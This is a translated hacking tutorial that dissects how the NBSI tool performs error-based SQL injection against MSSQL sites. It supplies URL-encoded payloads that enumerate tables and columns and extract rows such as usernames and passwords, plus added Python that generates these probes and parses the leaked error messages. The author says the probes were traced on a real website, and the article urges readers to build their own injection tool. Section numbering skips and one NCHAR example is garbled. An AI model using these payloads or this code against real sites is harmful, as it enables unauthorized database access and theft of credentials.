NBSI Injection Analysis and tracking report (MSSQL)

Source: emotional network Author: Softbug

Preface:

Writing a good tool is not easy, and writing a good injection tool is harder still. This article traces the requests NBSI sends during an injection and works out the testing ideas of its skilled author step by step. That is useful for manual analysis, and carefully following what NBSI probes for is also a good way to appreciate how an injection attack is put together.

For the test we found an IT site. The test was used only to trace NBSI's probing logic; the site was never maliciously damaged!

1. Injection Point Detection

Suppose the injection point is: http://www.xxx.com/zhuru.asp?id=1

NBSI first tests the connection with:

http://www.xxx.com/zhuru.asp?id=1 and user%2bchar(124)>0

(%2b is the URL encoding of +, so the injected condition is: and user+char(124)>0.)

At first I did not understand why char(124) is appended. Its value is the "|" symbol. user returns the current database user name as a string; appending "|" and comparing the result with the integer 0 forces SQL Server into a type-conversion error that echoes the name back. We will come back to this later.

Of course, with IIS error messages enabled, the page reports the error and returns an HTTP 500 status. The author probably uses this as the basis for deciding that the parameter is injectable.


3. Guessing the table name

Tracing shows that the author retrieves a table name with a single statement, which is very efficient. The table-name guessing code is:

And (select Top 1 cast(name as varchar(8000)) from (select Top 1 id,name from sysobjects where xtype=char(85) order by id) T order by id desc)>0

Do you see the 1 in the inner "select Top 1" (marked red in the original)? It is the position of the table to retrieve: 1 for the first user table, 2 for the second, and so on. xtype=char(85) means xtype='U', i.e. user tables, written with char() so that no quote is needed. The inner query takes the first N tables by id, the outer "Top 1 ... order by id desc" keeps only the N-th, and comparing its name with 0 triggers the conversion error that leaks it.

How do we know when all table names have been obtained? Simple: Top N returns every row once N exceeds the number of tables, so as soon as position X and position X+1 return the same name, the enumeration is complete.


5. Guessing the column name

Tracing shows that the author also retrieves a column name with a single statement. Perhaps this is the advantage of MSSQL; with Access the name may have to be guessed letter by letter. The column-name guessing code is:

And (select Top 1 cast(name as varchar(8000)) from (select Top 1 colid,name From syscolumns where id=OBJECT_ID(NCHAR(78)%2BNCHAR(101)%2BNCHAR(119)%2BNCHAR(115)%2BNCHAR(95)%2BNCHAR(85)%2BNCHAR(115)%2BNCHAR(101)%2BNCHAR(114)) Order by colid) T Order by colid desc)>0

Do you see the 1 in the inner "select Top 1" (red in the original)? It is the ordinal of the column name to retrieve; change it to 2 to get the second column. The end of the column list is detected the same way as the end of the table list: when X and X+1 return the same name.

Note:

NCHAR(78)%2BNCHAR(101)%2BNCHAR(119)%2BNCHAR(115)%2BNCHAR(95)%2BNCHAR(85)%2BNCHAR(115)%2BNCHAR(101)%2BNCHAR(114)

To avoid the restriction on quote characters, the author builds the table name string by concatenating NCHAR() values (%2B is the encoding of +). The numbers in brackets are the character codes; the string above spells News_User, the table whose columns are being guessed.


Example:

If the table is named xfiletd and we want its columns, we just need to convert the name with the HUIE plug-in. We get the following characters:

Nchar(78)%2bnchar(66)%2bnchar(69)%2bnchar(6C)%2bnchar(65)%2bnchar(74)%2bnchar(75)

Note that the plug-in shows the codes in hexadecimal here (0x78 is "x", 0x66 is "f", and so on). NCHAR() takes a decimal argument, so "x" must be written NCHAR(120) before the string is sent.


Haha! Fast!
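The following Python is an added example, not code from NBSI or from this article. It builds the table and column probes quoted in sections 3 and 5 for any position N, spells a table name with NCHAR() as the note above describes (and decodes the page's own NCHAR string back to News_User), URL-encodes the probe so that + survives as %2B, and simulates the Top-N trick against a constructed list of table names to show why the enumeration stops once probe X and probe X+1 agree. The table names in USER_TABLES are assumptions; the query shapes follow the statements quoted above.

```python
"""Added example (not NBSI's own code): build NBSI-style table/column probes
for MSSQL and simulate the TOP-N stop rule on a constructed table list."""
from __future__ import annotations

import re
from urllib.parse import quote


def nchar_concat(name: str) -> str:
    """Spell `name` as NCHAR(n)+NCHAR(n)+... so the payload needs no quote character."""
    return "+".join(f"NCHAR({ord(c)})" for c in name)


def decode_nchar(expr: str) -> str:
    """Reverse of nchar_concat; tolerates URL-encoded '+' (%2B) and any letter case."""
    return "".join(chr(int(n)) for n in re.findall(r"n?char\((\d+)\)", expr, re.I))


def table_probe(n: int) -> str:
    """Probe for the n-th user table (1-based). xtype=char(85) is xtype='U'.

    The inner SELECT TOP n returns the first n tables by id; the outer
    TOP 1 ... ORDER BY id DESC keeps the n-th one, and comparing a name with
    the integer 0 raises the conversion error that echoes it back.
    """
    return (
        " and (select top 1 cast(name as varchar(8000)) from "
        f"(select top {n} id,name from sysobjects where xtype=char(85) order by id) T "
        "order by id desc)>0"
    )


def column_probe(table: str, n: int) -> str:
    """Probe for the n-th column of `table`; the table name is passed via NCHAR()."""
    return (
        " and (select top 1 cast(name as varchar(8000)) from "
        f"(select top {n} colid,name from syscolumns where id=OBJECT_ID({nchar_concat(table)}) "
        "order by colid) T order by colid desc)>0"
    )


def url_encode(payload: str) -> str:
    """Encode for a GET parameter. '+' must become %2B, or IIS decodes it as a
    space and the string concatenation silently disappears."""
    return quote(payload, safe="(),=>[]")


def top_n_then_last(rows: list[str], n: int) -> str:
    """What `select top 1 ... from (select top n ... order by k) T order by k desc` yields.

    TOP n on fewer than n rows returns them all, so for every n >= len(rows)
    the result is the last row. That is why probe X and probe X+1 leaking the
    same name means the list is exhausted.
    """
    return rows[:n][-1]


def enumerate_names(rows: list[str]) -> list[str]:
    """Walk n = 1, 2, ... and stop when two consecutive probes agree (NBSI's rule)."""
    if not rows:
        return []
    found: list[str] = []
    n = 1
    while True:
        current = top_n_then_last(rows, n)
        found.append(current)
        if current == top_n_then_last(rows, n + 1):
            return found
        n += 1


# Constructed snapshot of sysobjects names with xtype='U', already ordered by id
# (assumed names, not taken from the site in the article).
USER_TABLES = ["News_Style", "News_User", "News_Item"]

if __name__ == "__main__":
    for i in (1, 2):
        print(url_encode(table_probe(i)))
    print(url_encode(column_probe("News_User", 1)))
    print(decode_nchar("NCHAR(78)%2BNCHAR(101)%2BNCHAR(119)%2BNCHAR(115)%2BNCHAR(95)"
                       "%2BNCHAR(85)%2BNCHAR(115)%2BNCHAR(101)%2BNCHAR(114)"))
    print(enumerate_names(USER_TABLES))
```

The simulation is the whole point of the stop rule: top_n_then_last(USER_TABLES, 3) and top_n_then_last(USER_TABLES, 4) both give the last table, so the third probe is the last one needed. In a real run the "return value" is the name echoed in the 500 page, not a Python list lookup.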

6. Guessing the data

Next let us look at how NBSI retrieves the data. There is no magic here; it is brute force. Let us see how the experts do it.

1) Obtain the number of records in the table

And%20(select%20cast(Count(1)%20as%20varchar(8000))%2Bchar(97)%20From%20[News_Style]%20where%201=1)>0

News_Style (red in the original) is the table being read. The author uses a common trick here. Count(1) is an INT, so comparing it with 0 causes no type-conversion error and nothing is leaked. By concatenating char(97), the character "a", the result becomes a string such as "12a", and comparing that with zero forces a conversion error whose message contains the string. Now it should be clear why the very first probe appended a "|" symbol: it guarantees that the compared value is a non-numeric string.

2) Obtain the field values

Once the record count is known, the field values are read out one record at a time. The author has no special trick here; the code is:

And (select Top 1 isNull(cast([sName] as varchar(8000)),char(32))%2Bchar(124) from (select Top 9 sName From [News_Style] where 1=1 Order by sName) T Order by sName desc)>0

News_Style is again the table being read, and the 9 (green in the original) means the 9th record of the sName field is wanted. Loop over the record count, and the data is yours.

Note: char(124) is appended for the reason given above, to make the compared value a string so that the INT comparison fails and the data is exposed. This is why fields retrieved by NBSI carry a trailing "|"; the author was probably too lazy to strip it. :-) The isNull(..., char(32)) wrapper matters as well: a NULL field would make the whole concatenation NULL, NULL compared with 0 raises no error, and the record would silently be missed, so NULL is replaced with a space.

Have you seen it? There is a "|" symbol.

3) Guessing two or more fields at once

You may think tracing how NBSI reads a single field is already interesting. Suppose we want the values of two fields of a table; how is that written?

NBSI's code is:

Step one: obtain the record count as in 1).

Step two:

And (select Top 1 isNull(cast([UserName] as varchar(8000)),char(32))%2Bchar(124)%2BisNull(cast([PassWord] as varchar(8000)),char(32)) From (select Top 1 UserName,passWord From [News_User] where 1=1 Order by UserName,PassWord) T Order by UserName desc,PassWord desc)>0

(The "|" symbol separates the two values.)

News_User is the table name, and char(124) needs no further explanation. Compare this statement with the one in 2) to see how the author gets several field values in one request. Since one request costs about the same whether it returns one field or all of them, select all the fields the next time you use NBSI!
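As an added example (not NBSI's code), the Python below builds the count and row probes from 1), 2) and 3) for any table and column list, and parses the value SQL Server leaks in the conversion error, which also covers the user+char(124) probe from section 1. The IIS error bodies are constructed samples in the two wordings SQL Server uses (the SQL Server 2000 "Syntax error converting ..." message and the 2005 and later "Conversion failed ..." message); the table and column names and the sample values are assumptions.

```python
"""Added example (not NBSI's own code): build NBSI-style count/row probes for
MSSQL and parse the value that SQL Server leaks in the int-conversion error."""
from __future__ import annotations

import re
from typing import Optional

SEP = "|"  # char(124)


def count_probe(table: str) -> str:
    """Leak COUNT(*) of `table`. COUNT is an int and compares with 0 silently, so
    CHAR(97) ('a') is appended: '12a' cannot convert to int and the error echoes it."""
    return f" and (select cast(count(1) as varchar(8000))+char(97) from [{table}] where 1=1)>0"


def row_probe(table: str, columns: list[str], n: int) -> str:
    """Leak row n (1-based, ordered by `columns`) of `table` in one request.

    Every column is cast to varchar and wrapped in ISNULL(..., CHAR(32)): a NULL
    column would turn the whole concatenation into NULL, NULL > 0 raises no
    error, and the row would be lost. CHAR(124) '|' separates the columns and
    guarantees the compared value is not numeric, so the comparison with 0
    always fails even when the data itself is a number.
    """
    parts = [f"isnull(cast([{c}] as varchar(8000)),char(32))" for c in columns]
    expr = f"+char({ord(SEP)})+".join(parts)
    if len(columns) == 1:
        expr += f"+char({ord(SEP)})"  # a single field still needs the '|' type guard
    asc = ",".join(columns)
    desc = ",".join(f"{c} desc" for c in columns)
    return (
        f" and (select top 1 {expr} from (select top {n} {asc} from [{table}] "
        f"where 1=1 order by {asc}) T order by {desc})>0"
    )


# The two wordings SQL Server uses when a string cannot be converted to int:
# SQL Server 2000 (as echoed through the OLE DB/ODBC provider) and SQL Server 2005+.
ERROR_PATTERNS = [
    re.compile(r"Syntax error converting the n?varchar value '(.*?)' to a column of data type int"),
    re.compile(r"Conversion failed when converting the n?varchar value '(.*?)' to data type int"),
]


def leaked_value(page: str) -> Optional[str]:
    """Return the quoted value from an IIS 500 page that echoes the SQL error, else None."""
    for pattern in ERROR_PATTERNS:
        match = pattern.search(page)
        if match:
            return match.group(1)
    return None


def parse_count(page: str) -> Optional[int]:
    """Interpret the '<digits>a' value produced by count_probe."""
    value = leaked_value(page)
    if value is None or not value.endswith("a") or not value[:-1].isdigit():
        return None
    return int(value[:-1])


def parse_row(page: str, ncols: int) -> Optional[list[Optional[str]]]:
    """Split a row_probe result on '|'; a lone CHAR(32) is the ISNULL stand-in for NULL."""
    value = leaked_value(page)
    if value is None:
        return None
    fields = value.split(SEP)
    if ncols == 1:
        fields = fields[:1]  # drop the empty piece after the trailing '|'
    if len(fields) != ncols:
        return None
    return [None if f == " " else f for f in fields]


# Constructed IIS error bodies (not real captures) in both wordings.
SAMPLE_USER_PAGE = (
    "Microsoft OLE DB Provider for ODBC Drivers error '80040e07'\n"
    "[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the "
    "nvarchar value 'dbo|' to a column of data type int.\n/zhuru.asp, line 9"
)
SAMPLE_COUNT_PAGE = "Conversion failed when converting the varchar value '12a' to data type int."
SAMPLE_ROW_PAGE = "Conversion failed when converting the varchar value 'admin|x1y2z3' to data type int."

if __name__ == "__main__":
    print(count_probe("News_Style"))
    print(row_probe("News_User", ["UserName", "PassWord"], 1))
    print(leaked_value(SAMPLE_USER_PAGE), parse_count(SAMPLE_COUNT_PAGE), parse_row(SAMPLE_ROW_PAGE, 2))
```

Two caveats the parser makes visible: a field that itself contains "|" will be split into extra pieces and the row rejected, and a real value of a single space is indistinguishable from the ISNULL replacement. Both are inherent to the separator NBSI chose; a tool of your own could pick a separator that cannot occur in the data.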


Summary: Friends who want to write their own VB code can build a program from this analysis, and you will have your own NBSI. Today's HUIE already has this function; see www.hack0.net.

Postscript:

The most important part of writing a program is the idea behind it; the details you see are only part of a good program. How does NBSI decide whether a site is injectable? Forcing a SQL error is only one approach. Two further ideas NBSI uses are:

2. Check the IIS status line: a normal page returns 200, and a 500 means the server hit an error.

3. Compare the page content IIS returns for the normal and the injected request to judge whether injection is possible. (Some sites return very large HTML pages, so comparing them programmatically is slow; not recommended.)

We still have a lot to learn. Injection is more than brute-forcing a database.

NBSI is in fact a very large piece of software, and our analysis was done entirely with IIS error messages enabled and with the "numeric" injection type, so it has its limitations. We will continue to follow up and explore NBSI's injection ideas fully. Detecting Access injection may be a difficult and tedious programming task; could you write it? NBSI still has flaws in many areas, and after reading our articles you may be able to write an even better tool. If you are interested, follow our NBSI analysis reports. Anyone interested is also welcome to write their own small network plug-ins and send them to www. h.
